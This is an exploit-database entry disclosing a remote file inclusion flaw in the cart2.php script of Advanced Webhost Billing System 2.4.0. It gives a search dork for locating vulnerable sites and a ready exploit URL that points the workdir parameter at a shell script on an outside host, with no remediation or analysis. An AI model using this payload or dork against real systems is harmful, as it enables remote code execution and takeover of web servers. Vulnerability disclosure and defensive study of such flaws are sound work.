id: 1794
date: 04/23/2007
title: Advanced Webhost Billing System (AWBS) cart2.php RFI Vulnerability
author: DamaR
cves: 

==================================================================
Advanced Webhost Billing System (AWBS) cart2.php RFI Vulnerability
==================================================================



#AWBS v2.4.0  Remote file include[cart2.php]

#Demo  : http://www.awbs.com/demo.php

#D0rk : Inurl:awbs.php

#Exploit


#http://localhost/[gpb_path]/docs/front-end-demo/cart2.php?workdir=http://sh3ll.com/for.txt?


#Discovered by : DamaR



#  0day.today [2023-03-21]  #